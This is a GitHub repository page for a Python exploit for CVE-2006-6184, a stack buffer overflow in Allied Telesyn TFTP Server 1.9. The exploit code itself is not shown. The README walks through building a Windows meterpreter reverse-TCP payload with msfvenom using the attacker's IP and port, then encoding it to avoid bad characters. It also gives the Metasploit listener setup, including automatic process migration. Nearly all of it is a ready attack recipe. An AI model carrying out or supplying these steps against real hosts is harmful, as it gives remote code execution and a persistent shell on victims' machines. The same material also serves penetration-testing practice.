Skip to content

This is a python-based standalone exploit for CVE-2006-6184. This exploit triggers a stack-based buffer overflows in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allow remote attackers to cause a denial of service or execute arbitrary code.

Notifications You must be signed in to change notification settings

mwidomski/cve-2006-6184

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 

Repository files navigation

CVE-2006-6184

This is a python-based standalone exploit for CVE-2006-6184. This exploit triggers a stack-based buffer overflow in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allowing remote attackers to cause a denial of service or execute arbitrary code.

Instructions (Updated for 2020)

The payload must be customized to include your own IP address and listening port, so you'll need to generate it manually. To do so, use the following steps:

1.) Enter the following to create a hex file of the amount that needs to be subtracted from the stack pointer (3500):

perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj

2.) Next, use the following command to create a staged meterpreter shell payload:

msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload

3.) Then, combine the two files you just created.

cat stackadj payload > shellcode

4.) Finally, let's eliminate the bad characters.

msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -t python

Enter the output as the value of the "payload" variable. You may need to run this exploit a few times for it to work.

Metasploit Listener

  1. use exploit/multi/handler
  2. set PAYLOAD windows/meterpreter/reverse_nonx_tcp
  3. set ExitOnSession false
  4. set AutoRunScript post/windows/manage/migrate
  5. exploit -j

About

This is a python-based standalone exploit for CVE-2006-6184. This exploit triggers a stack-based buffer overflows in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allow remote attackers to cause a denial of service or execute arbitrary code.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%